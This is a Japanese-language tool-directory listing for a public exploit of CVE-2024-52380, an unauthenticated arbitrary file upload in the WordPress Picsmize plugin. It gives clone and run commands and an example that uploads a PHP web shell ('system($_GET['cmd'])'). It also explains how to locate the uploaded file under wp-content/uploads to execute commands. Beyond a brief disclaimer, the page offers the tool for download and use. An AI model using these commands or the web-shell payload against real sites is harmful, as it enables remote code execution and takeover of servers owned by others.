Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-52380-Exploit — WordPress用Picsmizeプラグインは、任意のファイルアップロードに対して脆弱です。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-52380-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

WordPress用Picsmizeプラグインは、任意のファイルアップロードに対して脆弱です。

リポジトリを見る
311年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-52380-Exploit

WordPress用Picsmizeプラグインは、任意のファイルアップロードに対して脆弱です。

説明

このスクリプトは、WordPress用のPicsmizeプラグインにおける脆弱性(CVE-2024-52380)を悪用し、認証されていない攻撃者が任意のファイルをアップロードできるようにします。この脆弱性は、Picsmizeの1.0.0までの全バージョンに存在します。この脆弱性を悪用すると、ターゲットサーバー上でリモートコード実行が発生する可能性があります。

🌟 特徴

  • プラグインのバージョン確認: 対象のWordPressサイトが脆弱なバージョンのPicsmizeプラグインを使用しているか自動的に検証します。
  • ファイルアップロードの悪用: サイトが脆弱な場合、任意のPHPペイロードをターゲットサーバーにアップロードします。
  • コマンドラインインターフェース: 対象URLとペイロードを指定するための使いやすいCLIです。

📖 脆弱性の詳細

  • プラグイン名: Picsmize
  • 影響を受けるバージョン: 全バージョン ≤ 1.0.0
  • 脆弱性の種類: 認証されていない任意のファイルアップロード
  • CVE ID: CVE-2024-52380

🚀 使用手順

前提条件

  • Python 3.7以上
  • requestsライブラリ(pip install requests)

スクリプトの実行

  1. リポジトリをクローンします:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    
    

使用方法 -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

例

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

コマンドライン引数

このスクリプトは、使いやすさのために2つのコマンドライン引数を提供します。

  1. -u / --url (必須):

    • 目的: 対象のWordPressサイトのベースURLを指定します。
    • 例:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (オプション):

    • 目的: アップロードするPHPペイロードの内容を設定します。
    • デフォルト値:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • 例:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 ファイルアップロード先

説明:

  • /wordpress: WordPressサイトのルートディレクトリ。
  • wp-content/uploads: WordPressにおけるメディアアップロードのデフォルトディレクトリ。
  • 2025/01: このディレクトリ構造は、サーバーの日付設定に基づく年(2025年)と月(1月)に対応しています。

アップロードされたファイルにアクセスする方法:

  1. アップロードが成功したら、完全なURLを使用してファイルに移動します。 例:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ 免責事項

このスクリプトは、教育目的および許可されたセキュリティテスト専用です。所有していない、またはテストする明示的な許可を得ていないシステムに対するこのツールの不正使用は、違法かつ非倫理的です。

ツールをダウンロード